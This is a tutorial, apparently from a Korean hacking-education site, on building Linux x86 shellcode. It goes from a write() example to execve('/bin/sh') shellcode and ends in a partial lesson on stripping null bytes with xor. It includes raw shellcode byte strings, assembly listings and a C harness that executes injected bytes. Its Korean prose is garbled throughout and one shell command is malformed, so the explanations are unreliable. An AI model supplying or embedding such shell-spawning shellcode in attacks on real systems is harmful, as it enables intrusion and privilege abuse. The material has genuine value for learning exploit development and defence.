* ڵ  

 α׷  帧   ִ  α׷ Ͽ  
½ų ,  巹   ڵ ּҷ  Լ 
   ڵ尡 ǵ Ѵ. ׷   ڵ  
 ϱ?     ڴ.

"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0
\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80
\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"

 "ڵ带  " ϸ  ̺ Դ  ִ.  ڵ
   ׷?    ü ׷  
ƴ ڵ带  ۾  ణ     ʿѰ
̴. ,  ѹ    ų,  
ٷ  𸣴 Դ ڵ带   ư   ִ.
, ռ ߵ  ü     ʴ. 
ϰ    ó ڵ带   , ó ִ
    ϰ, װͿ  ͼ  Ŀ ڵ
  ϶ ̴. ѹ   پ   ,
̷ Ѵܰ辿  ö󰡸   ְ ڵ   տ
  ְ ȴ.

׷ 츮   ִ  ڵ     ϱ?
⿡ ϰ ȭ鿡 Hello, Students!  ϴ  ڵ带
  ϰڴ. ȭ鿡 ڿ Ϸ printf() Լ ϸ
ȴ. ,  printf() Լ   write() Լ Ѵ.
, printf() Լ write() Լ   ϰ    
̺귯 Լ ̴.  printf() Լ write() Լ ξ  
ϰ Ǿ ִ. write() Լ Ȯ ̱  翬 ̴.

׷ ִ  ڵ带 ϰ ϱ  츮 write() Լ Ͽ
ڿ   ̴. ϴ, write() Լ ̿Ͽ ȭ鿡 ڿ
ϴ C ڵ带    .

========================================
int main()
{
	write(1, "Hello, Students!\n", 17);
}
========================================

ù ° ڴ   ϴ μ, 1 ǥ . , 츮 
ִ ͹̳ ȭ ȴ.  ° ڴ  ȭ鿡  ڿ̰, 
ڴ  ڿ ̸   ̴.

  ڵ带 . ؼ ѹ  , ȭ鿡  ڿ
µǴ 翬     ̴.  츮 ϴ   ڵ带
  ̴.  0 1 ؼ  ƴ ǻͰ ϴ 
       ̴. , ΰ  0 1
δ ʹ ؼ ƹ ͵   . 

׷ ߵ  ٷ ̴.  C PHP, JAVA 
 ǻ   ̴. ׸, ΰ ϴ ǻ   
   ̱⵵ ϴ. ,츮 C ٷ  
ٲٴ    ʰ, C ϴ  ǥϰ,   
װ  ٲٴ   ̴.

"C   ٲ?"

̵ 츮 ſ ģ α׷ gcc gdb  ۾ ش.
,     α׷ .

=======================================================
[root@hackerschool assem]# gcc -o write write.c -static
[root@hackerschool assem]#
=======================================================

ó -static ɼ ༭  ؾ write() Լ α 
   ִٴ  ؾ Ѵ.
 gdb ̿Ͽ    ȯ ̳ʸ мغ.
gdb  (α׷  мϴ ۾)   ڵ带 
 ִ ɵ  ִ.

===========================================================================
[root@hackerschool assem]# gdb write
GNU gdb Red Hat Linux (5.1.90CVS-5)
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(gdb)
===========================================================================

   write α׷ gdb ҷδ. 
   main() Լ   . ó  
 ȯϴ ۾ 𽺾(disassembling)̶ θ.

================================================
(gdb) disassem main
Dump of assembler code for function main:
0x80481e0 <main>:       push   %ebp
0x80481e1 <main+1>:     mov    %esp,%ebp
0x80481e3 <main+3>:     sub    $0x8,%esp
0x80481e6 <main+6>:     sub    $0x4,%esp
0x80481e9 <main+9>:     push   $0x11
0x80481eb <main+11>:    push   $0x808ce68
0x80481f0 <main+16>:    push   $0x1
0x80481f2 <main+18>:    call   0x804ccf0 <write>
0x80481f7 <main+23>:    add    $0x10,%esp
0x80481fa <main+26>:    leave
0x80481fb <main+27>:    ret
End of assembler dump.
(gdb)
================================================

 츮 ڵ main() Լ  ǥ ̴.
ϵ write α׷ ǻͰ   ִ  · Ǿְ,
  gdb ؼϿ    ̴.

  ڵ ؼ    ϱ ϰ, ⿡
ܼ 0x11 push ǰ,   0x808ce68 push ǰ,    0x1 
push  ,  write Լ call   ؼ   ȴ. 

ռ Դ 0x11, 0x808ce68, 0x1 ü ϱ? ϴ ̰ 10
ٲ㺸. ׷ 0x11 17 ǰ, 0x808ce68 ּ  ̴ ׳
θ, 0x1 ״ 1 ȴ. ?    ̴.

write(1, "Hello, Students!\n", 17);

ٷ write Լ ڵ ̴. ׷, 0x808ce68 "Hello..." ڿ
  ó ּҰ ƴұ?

 gdb  Ȯ .

======================================================
(gdb) x/s 0x808ce68
0x808ce68 <_IO_stdin_used+4>:    "Hello, Students!\n"
(gdb)
======================================================

 ¾Ҵ. write Լ 3 ڰ ʴ push  ̴. push ̶
ϸ, ÿ   Ǵ  Ѵ. ٽ  push ÿ 
 ִ  ̴. ׷  , "1, ڿ, "  ƴ
", ڿ, 1" . , ݴ   Ϳ ָ϶. ó
Լ(⿡ write) ڴ ÿ ݴ  ǰ Ǿִ. 
⿡ ״ ߿  ƴڸ,  ÷ο ݿ ־ Լ
ڰ Ǵ  ſ ߿ϴ    ʿ䰡 ִ.

, ׷  ̷ write() Լ ڸ ʴ ÿ push  
 ó write() Լ call ϸ Ǵ ϱ? ٽ ؼ 
     Ǵ ϱ? ƽ, ̷ ϸ
󸶳 . 츮 write() Լ ϴ    
־߸ Ѵ. 

׷ ̹ write() Լ ü   ϴ gdb ̿Ͽ  
   .

============================================================
(gdb) disass write
Dump of assembler code for function write:
0x804ccf0 <write>:      push   %ebx
0x804ccf1 <write+1>:    mov    0x10(%esp,1),%edx
0x804ccf5 <write+5>:    mov    0xc(%esp,1),%ecx
0x804ccf9 <write+9>:    mov    0x8(%esp,1),%ebx
0x804ccfd <write+13>:   mov    $0x4,%eax
0x804cd02 <write+18>:   int    $0x80
0x804cd04 <write+20>:   pop    %ebx
0x804cd05 <write+21>:   cmp    $0xfffff001,%eax
0x804cd0a <write+26>:   jae    0x804d510 <__syscall_error>
0x804cd10 <write+32>:   ret
0x804cd11 <write+33>:   jmp    0x804cd20 <fcntl>
0x804cd13 <write+35>:   nop
......
0x804cd1f <write+47>:   nop
End of assembler dump.
(gdb)
============================================================

 ٽ Ǵ κ  .

0x804ccf1 <write+1>:    mov    0x10(%esp,1),%edx
0x804ccf5 <write+5>:    mov    0xc(%esp,1),%ecx
0x804ccf9 <write+9>:    mov    0x8(%esp,1),%ebx
0x804ccfd <write+13>:   mov    $0x4,%eax
0x804cd02 <write+18>:   int    $0x80

 ڵ    κп ִ int ڵ( ) 
interrupt ڷμ, ýۿ Ư ȣ   Ѵ.  
0x80 ͷƮ Ŀ ý ,  Ŀο ڵ鿡  ִ
Լ ȣ϶ ǹ̸  ִ. ׷   Լ ȣ϶
ϰ ִ ϰ? int ٷ    0x4 ڰ ´.
̰ ٷ " Լ" ˷ְ , 4  ǹ̴
ý  ̺ 4° ϵ Լ ϰ ִ ̴.
 ° ̺  Լ ϵǾִ   /usr/include/asm/
unistd.h Ȥ /usr/src/linux/include/asm-i386/unistd.h  .

============ unistd.h =============

#define __NR_exit                 1
#define __NR_fork                 2
#define __NR_read                 3
#define __NR_write                4
#define __NR_open                 5
#define __NR_close                6
#define __NR_waitpid              7
#define __NR_creat                8
...  ...

===================================

 ó  ڿ Ǵ Լ Ȯ  ,  ٽ 4 
write() Լ ǹѴٴ    ִ.

mov   mov A, B   , A B ϴ 
Ѵ. , mov $0x4, %eax  eax (CPU   ) 4 
ϴ ̴.

 int 0x80  ϸ, CPU ͵  eax, ebx, ecx, edx  
 ҷͼ ϴµ,    ù°  eax  Լ
ȣ ˰ ǰ,   ebx, ecx, edx ͵  ʴ  
Լ ڷ  ȴ.

,  Ǹ ˰ ִٸ,   𸣴 ebx 1, ecx
"Hello..." ּ, ׸ edx  ڿ  17  ȴٴ
     ִ.   ڵ带 Ȯϰ ̾Ϸ,
Stack Pointer(esp) Base Pointer(ebp)  ϱ⸸ ϸ Ǵµ, 
 "  ÷ο"  ¿  ϱ ϰڴ.

,  ݱ   .

* Hello, Students!  µǴ   ǥ.

(1) write() Լ   17 STACK .
(2)  °  "Hello..." ڿ  ּҰ STACK .
(3) ù °  1 STACK .
(4) write() Լ ȣ.
(5)   17 edx .
(6)  °  "Hello..." ڿ ּҰ ecx .
(7) ù °  1 ebx .
(8) write() ý  ǹϴ 4 eax .
(9) ý  ȣϴ int 0x80 ͷƮ ߻.
(10) eax, ebx, ecx, edx  Ͽ ش ý  write() .

 Ͽٸ,       ִ ϰ
 ۼ .

=================================
.LCO:
	.string "Hello, Students!\n"
.globl main
main:
	movl $0x04, %eax
	movl $0x01, %ebx
	movl $.LCO, %ecx
	movl $0x11, %edx
	int $0x80
	ret
=================================

? write() Լ   ٽ write() ý  ȣϴ
 ״ 䳻 ̴. ⼭ Լ ý   ٸ ̴.
Լ 츮  ϴ  Լ ϸ , ý ̶
Ŀ ؿ ϸ, Ŀ  ڰ   ֵ ִ Լ 
Ѵ. 

   ؼ  .  ڵ ̱ 
*.c ƴ, *.s Ϸ  Ѵٴ  Ѵ.

[root@hackerschool assem]# gcc -o write write.s
[root@hackerschool assem]# ./write
Hello, Students!
Segmentation fault
[root@hackerschool assem]#

ó ¥⸸ Ƽ ϴ ڿ ϴ Ϳ Ͽ. ׷, 
  ʰ Segmentation fault  Ÿ ȴ.  ̷  
ϱ?  ,  ret ɿ  ÿ return address 
 ּ  µ,   ÿ return address ̸ Ǿ
   ƹ ̳  װ jump Ϸϱ 
Ÿ ̴. , 츮  main() Լ ƴ, exit() Լ
α׷ ǰԲ ؼ Segmentaion fault    ִ.

׷,  exit(0)  ϴ  ϰ  .
 exit() ý  ý  ̺  ° ϵǾ ִ Ȯ
.

[root@hackerschool assem]# cat /usr/include/asm/unistd.h | exit
#define __NR_exit                 1
...  ...
[root@hackerschool assem]#

ٽ 1  Ǿִ.    .

movl $0x01, %eax
movl $0x00, %ebx
int $0x80

ſ ϴ.    ڵ忡  exit(0) ڵ带 ߰.
exit(0)  α׷   ִ ret  ص ϴ.

=================================
.LCO:
	.string "Hello, Students!\n"
.globl main
main:
	movl $0x04, %eax
	movl $0x01, %ebx
	movl $.LCO, %ecx
	movl $0x11, %edx
	int $0x80
	movl $0x01, %eax
	movl $0x00, %ebx
	int $0x80
=================================

 ٽ  Ͽ  .

[root@hackerschool assem]# gcc -o write write.s
[root@hackerschool assem]# ./write
Hello, Students!
[root@hackerschool assem]#

  Ϻ ڿ  α׷ Ǿ. ׷   
ڵ带   ϸ ִ. ϴ, Ϸ ̿ؼ  ڵ带
 ȯϵ . ̹ ռ Է gcc  ٷ  ۾ ߴ.
 ϵ write ɿ    ϴµ, ̹ /usr/bin/
objdump  ϸ ȴ.

==============================================================
[root@hackerschool assem]# objdump -d write
...  ...
080483e2 <main>:
 80483e2:       b8 04 00 00 00          mov    $0x4,%eax
 80483e7:       bb 01 00 00 00          mov    $0x1,%ebx
 80483ec:       b9 d0 83 04 08          mov    $0x80483d0,%ecx
 80483f1:       ba 11 00 00 00          mov    $0x11,%edx
 80483f6:       cd 80                   int    $0x80
 80483f8:       b8 01 00 00 00          mov    $0x1,%eax
 80483fd:       bb 00 00 00 00          mov    $0x0,%ebx
 8048402:       cd 80                   int    $0x80
...  ...
==============================================================

츮   ڵ尡 ״ µʰ ÿ ٷ  κп
   ȯǾ µǾ. ƴ, Ȯ ϸ ʿ
ִ  ȯǾ ʿ  µ ̴. ׸, 
  2 ǥ, 2 ϸ ̵ , 
츮 ˾ƺ⵵   ִ   16 · µǾ.
  16 ޿ ϳ ̾ ̸ μ  ϼȴ.
,  ڵ带 ڼ  ڸ, ̻ κ ϳ ִ. װ ٷ
 ° ڿ شϴ "ڿ  ּ"   ڿ 𿡵
 ʰ, ޶ ּ  ǰ ִ ̴.

mov    $0x80483d0,%ecx

̴, ϵ  ڿ ּ  ǰ,   κп 
̸  ּ. ٽ ؼ  ּҸ  ϰ ִ ̴.
  ·  ڵ带 ,      0x80483d0
 ڿ    ̰, 翬  ȯ濡 "Hello..."
 ڿ  ּ κп  ɼ ZERO    
ּ  ϴ   ǹ ̴. 
׷   "Hello..." ڿ   ڵ忡 Եǰ, 
 ڿ ּҸ %ecx Ϳ ϵ   ?

  ϸ  . ϴ ڿ  ּҰ ÿ ǵ
ϰ,   ÿ  ּ   %ecx Ϳ ϸ Ǵ 
̴.      ǥ ڴ.

=================================
.globl main
main:
        call func
        .string "Hello, Students!\n"
func:
        movl $0x04, %eax
        movl $0x01, %ebx
        popl %ecx
        movl $0x11, %edx
        int $0x80
        movl $0x01, %eax
        movl $0x00, %ebx
        int $0x80
=================================

call ɿ   Լ ȣǸ, Լ     巹.
, call  ٷ   ּҰ ÿ ȴ.   쿣
call func ٷ  ִ "Hello..." ڿ  ּҰ ÿ 
ȴ.  func Լ ȿ %eax write() ý  ǹϴ 4 
ǰ, %ebx ǥ  ǹϴ 1, ׸ ٷ %ecx   ִ
ܰ迡 popl  ÿ     ⿡ ִ  
Ѵ.     ⿡ ռ   巹. , 
"Hello..." ڿ  ּҰ Ǿ  ᱹ ڿ  ּҰ 
%ecx Ϳ  ̴. 

   ڵ带   , objdump   Ȯ  
.

==============================================================
[root@hackerschool assem]# objdump -d write
...  ...
080483d0 <main>:
 80483d0:       e8 12 00 00 00          call   80483e7 <func>
 80483d5:       48                      dec    %eax
 80483d6:       65                      gs
 80483d7:       6c                      insb   (%dx),%es:(%edi)
 80483d8:       6c                      insb   (%dx),%es:(%edi)
 80483d9:       6f                      outsl  %ds:(%esi),(%dx)
 80483da:       2c 20                   sub    $0x20,%al
 80483dc:       53                      push   %ebx
 80483dd:       74 75                   je     8048454 <gcc2_compiled.+0x4>
 80483df:       64 65 6e                outsb  %fs:%gs:(%esi),(%dx)
 80483e2:       74 73                   je     8048457 <gcc2_compiled.+0x7>
 80483e4:       21 0a                   and    %ecx,(%edx)
        ...

080483e7 <func>:
 80483e7:       59                      pop    %ecx
 80483e8:       b8 04 00 00 00          mov    $0x4,%eax
 80483ed:       bb 01 00 00 00          mov    $0x1,%ebx
 80483f2:       ba 11 00 00 00          mov    $0x11,%edx
 80483f7:       cd 80                   int    $0x80
 80483f9:       b8 01 00 00 00          mov    $0x1,%eax
 80483fe:       bb 00 00 00 00          mov    $0x0,%ebx
 8048403:       cd 80                   int    $0x80
 8048405:       8d 76 00                lea    0x0(%esi),%esi
...  ...
==============================================================

   ߸    캸. , ٵ "Hello..." 
ڿ   ʴ´.  ڿ  ִ ϱ? 
 °  , 48 65 6c ...  ۵Ǵ 16 ǥ 
ڵ尡 ִ. װ ٷ ƽŰ ڿ ǥϸ "Hello..." Ǵ
̴. ׸    ü Ҹ  ɵ "Hello.."
ڿ    ȯϿ Ϸ ϴ  ó
α׷      ǥ ̴.

,    ޿  ٷ ձ⸸ ϸ  츮 ϴ 
 .  ,  16    ռ ̾ .

e8 12 00 00 00 48 65 6c 6c 6f 2c 20 53 74 75 64 65 6e 74 73 21 0a 
              (H  e  l  l  o  ,     S  t  u  d  e  n  t  s  !  \n)
59 b8 04 00 00 00 bb 01 00 00 00 ba 11 00 00 00 cd 80 b8 01 00 00 00
bb 00 00 00 00 cd 80 8d 76 00

̷ ϼ    ٷ write(1, "Hello, Students!\n", 17); ǹϴ
 ڵ̴.  C  ׽Ʈ α׷   
ٸ α׷   ۵  ִ Ȯ .
ϴ, C     ֵ  ڵ尡 16  
˷.    16 ʿ \x ߰ϸ  ̴.

\xe8\x12\x00\x00\x00\x48 65 6c 6c 6f 2c 20 53 74 75 64 65 6e 74 73 21 0a 

, ٵ  κ  16 ٲ ʾƵ ȴ. ֳĸ տ \x 
  Ϸ װ ƽŰ ڷ ˾Ƽ  ؼϱ ̴.
 ڿ κ 16 ƴ 츮   ƽŰ ڷ ٲ.

\xe8\x12\x00\x00\x00Hello, Students!\n

ξ  . , objdump      ڿ
 \n ڷ ƹ͵ ,  \n ڿ ڿ  ˸ \00
Ѵ. objdump     κ "..."  Ǿ Ÿ
ؾ Ѵ.  \x00 Ҿ    յ .

\xe8\x12\x00\x00\x00Hello, Students!\n\x00
\x59\xb8\x04\x00\x00\x00\xbb\x01\x00\x00\x00\xba\x11\x00\x00\x00\xcd\x80\xb8
\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\x8d\x76\x00

 ϼǾ.     α׷   ڵ尡 
 Ǵ  Ȯ .

===========================================================================
int main()
{
	char *code = "\xe8\x12\x00\x00\x00Hello, Students!\n\x00"
                 "\x59\xb8\x04\x00\x00\x00\xbb\x01\x00\x00\x00\xba\x11\x00"
                 "\x00\x00\xcd\x80\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00"
                 "\xcd\x80\x8d\x76\x00";

	void (*pointer)(void); // Լ ּҸ ϴ Լ ͸ ߴ.

	pointer = (void *)code; // Լ ּ   ڵ  ּҸ 
                            // ؼ ġ Լ  νϵ Ѵ.

	pointer(); //   Լ ͸ ȣϸ,   ̴.
}
===========================================================================

  Ͽ   ..

===================================
[root@hackerschool assem]# ./write
Hello, Students!
[root@hackerschool assem]#
===================================

ó ݱ   ڵ尡 Ϻϰ ۵Ѵ.
׷    ڵ带 µ   ϳ  ġ
ϰڴ. ,  Hello, Students! ڿ ٸ   ٲٰ ʹٸ
 ؾ ұ? ׳  ڿ ٸ  ϸ ɱ? ϴ, ڿ
ٷ   . 

\xe8 \x12 \x00 \x00 \x00

⼭   \xe8 call ǹѴ. ׸   \x12 10 
18̸, ̴  18 Ʈ    call Ѵٴ ǹ̴.  
Ȯ 18 Ʈ  κп ڿ  شϴ "\x59\xb8..." ִ
   ִ. ̴ , ڿ ̰ ٲ call Ǵ ġ  ٲ
ٴ  ǹѴ.  ܼ  ٲ ڿ ̿ شϴ 
\xe8 \x12 κп ˸° Ű ̴. ,    
ϸ ξ ϰ ϴ ڿ ٲ   ְ ȴ.
⿡ ܼ ڿ ٲٴ Ϳ Ұ, ̰  Ű 
 ڵ忡 Ű, /bin/sh  ϴ ɵ  ų 
ְ  ̴.

ռ  ۼߴ  ڵ带   Ѵ.

====================================
.globl main
main:
		jmp come_here
func:
		movl $0x04, %eax
		movl $0x01, %ebx
		popl %ecx
		movl $0x11, %edx
		int $0x80
		movl $0x01, %eax
		movl $0x00, %ebx
		int $0x80
come_here:
		call func
		.string "Hello, Students!\n"
====================================

ó   η ڿ κ ڵ     . 
   Ͽ    ȯϸ   ȴ.

eb 1e b8 04 00 00 00 bb 01 00 00 00 59 ba 11 00 00 00 cd 80                  
b8 01 00 00 00 bb 00 00 00 00 cd 80 e8 dd ff ff ff
                                    ~~~~~~~~~~~~~~
                                    call κ     
48 65 6c 6c 6f 2c 20 53 74 75 64 65 6e 74 73 21 0a 00
H  e  l  l  o  ,     S  t  u  d  e  n  t  s  ! \n \00

ó ̹ call   dd ff ff ff , 0xffffffdd Ƿ
(  ) Ǿ.  0xffffffdd  ǹұ? ̸
int  10 ȯ , -35. ,   ȴ.
 ̹ ݴ call  κ   -35 Ʈ ̵Ͽ eb 
1e b8 ...  ϴ ̴. ̷ ϸ,   "Hello.." ڿ
 ٲ call  ̵ϴ ġ   ʴ´.
   ڿ  ٸ  ٲ  ְ Ǿ. , 
쿡  Ǵ  write() Լ   ڿ ̿ ش
ϴ   ٲپ ϸ, ڵ 쿣 "/bin/sh" ڿ  
NULL ߰ϱ ؼ ɾ ̸ ٲپ ϴ ŷο ֱ
ϴ. ,  ڵ带  ؽŰ   ̷  
ν ֱ ٶ.

׷ ̹ ռ   ȰϿ  ϴ  ڵ. , 
ڵ带     . ݱ  ٿ ,  C 
 ϴ Լ ,   װ gdb мϿ ִ 
ϰ  ǥ  objdump ̿ؼ   
,  װ͵ ޾   ڵ带  ԰ڴ.

-  ڵ  

1. C ش ڵ带 Ѵ.
2. gdb Ͽ ʿ κ ã´.
3. ¥⸸ ̾   Ѵ.
4.  , objdump  Ѵ.
5. µ  ϳ  Ų.

     ϴ  ϴ C ڵ带  . 
⼭ 츮   Լ ؾ    ڵ尡 
   Ѵ. system("/bin/sh"); ұ? ƴϸ, 
execl("/bin/sh", "sh", 0); ұ?     ְ, 
    Լ ϴ   õ ʴ´. ֳϸ 
printf() Լ ᱹ  write() Լ ߴ  ó,   
Լ  δ ᱹ execve() Լ ϱ ̴. , 
execve() Լ Ȯ system()̳ execl() Լ    
 ſ 鸸    ۿ   .   Լ
  Լ ϴ  ȮϷ, /usr/bin/strace 
 ϸ ȴ. strace system call trace ڷ, ش α׷
ϴ ý  ȭ鿡 ǽð ִ   ִ.

==========================
int main()
{
	system("/bin/sh");
}
==========================

ϰ  ڵ带 test ̸   , strace test Էϸ,
"execve("/usr/bin/test", ["test"], [/* 22 vars */])" κ   
Ȯ  ִ.      α׷ ᱹ Ŀο 
ϴ ý ݵ Ѵ.  츮   ϴ ls 
 δ open(), close(), read(), write()  ý  
ٴ  strace  Ȯ   ִ.

׷   Դ.      ʿ C ڵ
ٷ execve() Լ    ̴.

=================================
int main()
{
	char *str[2];
	str[0] = "/bin/sh";
	str[1] = 0;	
	execve(str[0], str, 0);
}
=================================

  ڵ带  , gdb  м .

=============================================================================
[root@hackerschool assem]# gcc -o execve execve.c -static
[root@hackerschool assem]# gdb execve
GNU gdb Red Hat Linux (5.1.90CVS-5)
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(gdb)
=============================================================================

 main Լ  disassemble ̴.

=========================================================
(gdb) disass main
Dump of assembler code for function main:
0x80481e0 <main>:       push   %ebp
0x80481e1 <main+1>:     mov    %esp,%ebp
0x80481e3 <main+3>:     sub    $0x8,%esp
0x80481e6 <main+6>:     movl   $0x808cec8,0xfffffff8(%ebp)
0x80481ed <main+13>:    movl   $0x0,0xfffffffc(%ebp)
0x80481f4 <main+20>:    sub    $0x4,%esp
0x80481f7 <main+23>:    push   $0x0
0x80481f9 <main+25>:    lea    0xfffffff8(%ebp),%eax
0x80481fc <main+28>:    push   %eax
0x80481fd <main+29>:    pushl  0xfffffff8(%ebp)
0x8048200 <main+32>:    call   0x804cb40 <execve>
0x8048205 <main+37>:    add    $0x10,%esp
0x8048208 <main+40>:    leave
0x8048209 <main+41>:    ret
0x804820a <main+42>:    mov    %esi,%esi
End of assembler dump.
(gdb)
=========================================================

main() Լ ȣǸ,  base point  ÿ ӽ ϰ,
  ο base point  Ѵ.  κп ؼ "  
ο" ¿ ڼ Ѵ.     
sub  ̿Ͽ Ҵϴµ,  8Ʈ Ҵ ޾Ҵ.  
 1 뷮 4 Ʈε, char *str[2]   2 ߱
̴. , str[0] "/bin/sh" ڿ  ޸ ּҸ ϰ,
str[1] NULL ǹϴ 0 ߴ. 
  ּ ޾ ϸ  .

=========================================================
(gdb) disass main
Dump of assembler code for function main:
0x80481e0 <main>:       push   %ebp 
                        //  base point  
0x80481e1 <main+1>:     mov    %esp,%ebp
                        // ο base point  
0x80481e3 <main+3>:     sub    $0x8,%esp
                        //  8 Ʈ  Ҵ
0x80481e6 <main+6>:     movl   $0x808cec8,0xfffffff8(%ebp)
                        // str[0] "/bin/sh" ڿ ּ 
0x80481ed <main+13>:    movl   $0x0,0xfffffffc(%ebp)
                        // str[1] NULL                        
=========================================================

   ٽ 4 Ʈ 뷮 Ҵ ޴µ,   ƹ ǹ̵
 DUMMY ̴. ٷ  κ   3  pushϴ 
  ִµ,  ͵  12 Ʈ̱  ϰ 16Ʈ
ֱ  4 Ʈ ߰ ̴. ù ° push execve()Լ 
 0 ÿ   ̴. ׸  ° push str[0] ּ
μ, *str[2]   迭  ּҸ ÿ  
̴.  push str[0]  ּ , "/bin/sh" ּ  ÿ
Ѵ. ׸  execve() Լ ȣμ, main() Լ м
.

=========================================================
0x80481f4 <main+20>:    sub    $0x4,%esp
                        // DUMMY  Ҵ
0x80481f7 <main+23>:    push   $0x0
                        //  °  0 
0x80481f9 <main+25>:    lea    0xfffffff8(%ebp),%eax
                        // str[0] ּ  %eax  
0x80481fc <main+28>:    push   %eax
                        //  °  str[0] ּ 
0x80481fd <main+29>:    pushl  0xfffffff8(%ebp)
                        //  °  str[1] 
0x8048200 <main+32>:    call   0x804cb40 <execve>
                        // execve() Լ ȣ
=========================================================

 main() Լ ȣ execve() Լ disassemble غ.
ټ   ڵ尡 µ, ߿ κ  Ұϴ.

====================================================
0x804cb46 <execve+6>:   mov    %esp,%ebp
0x804cb4c <execve+12>:  mov    0x8(%ebp),%edi 
0x804cb56 <execve+22>:  mov    0xc(%ebp),%ecx
0x804cb59 <execve+25>:  mov    0x10(%ebp),%edx
0x804cb5d <execve+29>:  mov    %edi,%ebx 
0x804cb5f <execve+31>:  mov    $0xb,%eax 
0x804cb64 <execve+36>:  int    $0x80
====================================================

ϴ,  ּ  Ȯϱ      .

 ޸ ּ                                            ޸ ּ
===========================================================================
  SFP | execve RET |  str[1]  |  str[0] ּ  | 0 | SFP | main RET
===========================================================================
<----- ÿ  ̴ 

 execve  ,   ο base point Ǹ,  
ù ° ڿ شϴ  %edi Ϳ ȴ. ׸ ű⼭ 3
Ʒ κ ,   ٽ %ebx ϴ    ִ.
   °  str[0] ּ  %ecx ȴ. 
%edx  °  0 ȴ. ̸ ϸ  .

%eax = 11 : execve ý  ȣ
%ebx = str[1] : "/bin/sh"
%ecx = str :  迭  ּ
%edx = 0 : NULL

====================================================
0x804cb46 <execve+6>:   mov    %esp,%ebp
0x804cb4c <execve+12>:  mov    0x8(%ebp),%edi 
                               // ù °  str[1]
0x804cb56 <execve+22>:  mov    0xc(%ebp),%ecx
                               //  °  str[0] ּ
0x804cb59 <execve+25>:  mov    0x10(%ebp),%edx
                               //  °  0
0x804cb5d <execve+29>:  mov    %edi,%ebx 
                               // str[1] ٽ %ebx 
0x804cb5f <execve+31>:  mov    $0xb,%eax 
                               // execve ý  ȣ 11
0x804cb64 <execve+36>:  int    $0x80
====================================================

, ׷      Ű α׷ 
ۼ .

* 츮 ؾϴ ͵
 
(1) %eax 11 ֱ
(2) %ebx "/bin/sh" ּҸ ֱ
(3) %ecx  迭 ["/bin/sh" ּ][0] ּҸ ֱ
(4) %edx 0 ֱ
(5) ý  ͷƮ ߻

ٽ (3) ϰ   ۾̴. (3) ϴ  
 캸 ü ڵ带 ϴ   ̴.

==============================================================
.globl main
main:
		jmp     come_here
		//     ũ .

func:
		movl    $0x0b, %eax
		// execve ý  ȣ 11 %eax .

		popl    %ebx
		// "/bin/sh" ּҸ %ebx . (ù° )

		movl    %ebx, (%esi)
		movl    $0x00, 0x4(%esi)
		// 迭 ͸ . ["/bin/sh" ּ][0]

		leal    (%esi), %ecx
		// 迭   ּҸ %ecx . (° )

		movl    $0x00, %edx
		// NULL . (° )

		int     $0x80
		// ý  ȣ ͷƮ ߻

		// ⼭ ʹ exit(0)  .
		movl    $0x01, %eax
		movl    $0x00, %ebx
		int     $0x80

come_here:
		calll func
		.string "/bin/sh\00"
==============================================================

׳   ϸ, װ  ü ǹ, 
 ȣ () , Ϳ Ǿִ ּ  ǹϰ ȴٴ 
 ϸ ڵ带 ϱ ٶ. ,  movl 0x0, %eax  ϸ,
%eax Ϳ 0 ϶ , movl 0x0, (%eax)  ϸ, 
%eax Ǿ ִ ּҿ 0 ϶ ̴.

  ڵ带 Ͽ,   Ǵ Ȯغ.

==================================================
[root@hackerschool assem]# gcc -o shell shell.s
[root@hackerschool assem]# ./shell
sh-2.05a#
==================================================

 ۵Ѵ.    ڵ带  ȯ.

============================================================================
[root@hackerschool assem]# objdump -d shell
...  ...
080483d0 <main>:
 80483d0:       eb 24                   jmp    80483f6 <come_here>

080483d2 <func>:
 80483d2:       b8 0b 00 00 00          mov    $0xb,%eax
 80483d7:       5b                      pop    %ebx
 80483d8:       89 1e                   mov    %ebx,(%esi)
 80483da:       c7 46 04 00 00 00 00    movl   $0x0,0x4(%esi)
 80483e1:       8d 0e                   lea    (%esi),%ecx
 80483e3:       ba 00 00 00 00          mov    $0x0,%edx
 80483e8:       cd 80                   int    $0x80
 80483ea:       b8 01 00 00 00          mov    $0x1,%eax
 80483ef:       bb 00 00 00 00          mov    $0x0,%ebx
 80483f4:       cd 80                   int    $0x80

080483f6 <come_here>:
 80483f6:       e8 d7 ff ff ff          call   80483d2 <func>
 80483fb:       2f                      das
 80483fc:       62 69 6e                bound  %ebp,0x6e(%ecx)
 80483ff:       2f                      das
 8048400:       73 68                   jae    804846a <gcc2_compiled.+0x1a>
 8048402:       00 00                   add    %al,(%eax)
...  ...
============================================================================

 ڵ忡  ⿣ ƹ   ,   ġ
 Ѵ. װ ٷ  ڵ ߰ ߰ \x00 ̶ ڰ ִٴ 
̴. ,  ڵ尡 strcpy()  ڿ ٷ Լ ȴٸ
ڵ  ߰ ©  ̴. ֳ, κ ڿ ٷ
Լ \x00(NULL) ڸ  װ ڿ  νϿ  о
̴ ۾ ߴϱ ̴.

׷   \x00    ?   Ǵ  Ʈ
ϳ Ұϰڴ.   ߿ xor ̶ Ÿ  ǹϴ
 ִ. Ÿ ̶, A B ־ , A B  ٸ 
 Ǵ  ̴.   .

A   :  1010       A   :  0010       A   :  1110       A   :  0010
B   :  1011       B   :  1001       B   :  0000       B   :  0010
 : 0001        : 1011        : 1110        : 0000

       ذ  ̴.  4 
ָ   ٷ  ° ̴. A 0010̰, B 0010  
  . ̷         0 Ǿ
. XOR    翬 Ÿ ̸, XOR  Ư¡̴.

, ׷  Ư    0 ä  ˾Ƴ´.
   "mov $0xb,%eax"  . %eax 0xb    4Ʈ
 ȯǼ Ǳ , δ "mov $0x0000000b %eax"  ȴ.
